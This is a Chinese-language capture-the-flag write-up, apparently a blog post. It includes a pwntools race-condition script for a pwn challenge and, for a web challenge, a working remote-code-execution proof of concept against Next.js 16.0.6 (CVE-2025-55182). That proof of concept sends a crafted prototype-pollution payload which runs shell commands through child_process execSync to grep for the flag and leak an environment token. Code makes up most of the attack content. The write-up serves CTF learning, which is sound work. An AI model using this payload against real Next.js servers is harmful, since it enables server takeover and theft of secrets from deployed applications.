不是很想打。孩子学了好多天pwn,真打不动了
Misc
5-Layer-Fog
赞美chatgpt,我好懒啊

RegexBeast
赞美codex,

Python
Pwn
password only
手速题
不过谁家好人在二进制里写的socket监听呢
Python
#!/usr/bin/env python3from pwn import *import timecontext.log_level = "info"# HOST, PORT = "127.0.0.1", 8888HOST, PORT = "06a37270f1b2.target.yijinglab.com", 57657def login(r, user, pwd): r.recvuntil(b"Available commands") r.sendline(f"LOGIN {user} {pwd}".encode())def toggler(): r = remote(HOST, PORT) login(r, "admin", "admin123") r.sendline(b"TOGGLE_ADMIN") return rdef reader(): r = remote(HOST, PORT) login(r, "user1", "pass123") time.sleep(0.1) log.info("reader: sending READ_FLAG with dummy signature") r.sendline(b"READ_FLAG") dummy_sig = b"0" * 512 r.recvuntil(b"hex string):") r.sendline(dummy_sig) data = r.recvrepeat(1) print(data.decode(errors="ignore")) r.close()t = toggler()reader()t.close()Web
freestyle
看了下用的nextjs 16.0.6,affected by CVE-2025-55182
于是直接出了,有两种做法,grep flag或者拿token都行
Python
import requestsimport sysimport jsonBASE_URL = "http://981f50bbeadc.target.yijinglab.com/"# BASE_URL = "http://localhost:3000"EXECUTABLE = "grep -r flag{ .next"EXECUTABLE = "echo token ${globalThis.CTF_CHALLENGE_TOKEN}"crafted_chunk = { "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": '{"then": "$B0"}', "_response": { "_prefix": f"var res = process.mainModule.require('child_process').execSync(`{EXECUTABLE}`,{{'timeout':5000}}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});", "_formData": { "get": "$1:constructor:constructor", }, },}files = { "0": (None, json.dumps(crafted_chunk)), "1": (None, '"$@0"'),}headers = {"Next-Action": "x"}res = requests.post(BASE_URL, files=files, headers=headers, timeout=10)print(res.status_code)print(res.text)print(json.loads(res.text.splitlines()[1][3:])["digest"])前几天没看这个漏洞,但是今天一看在nextjs勾石一样的请求套娃下,这个poc简直太优雅了,似乎react server还会麻烦一点。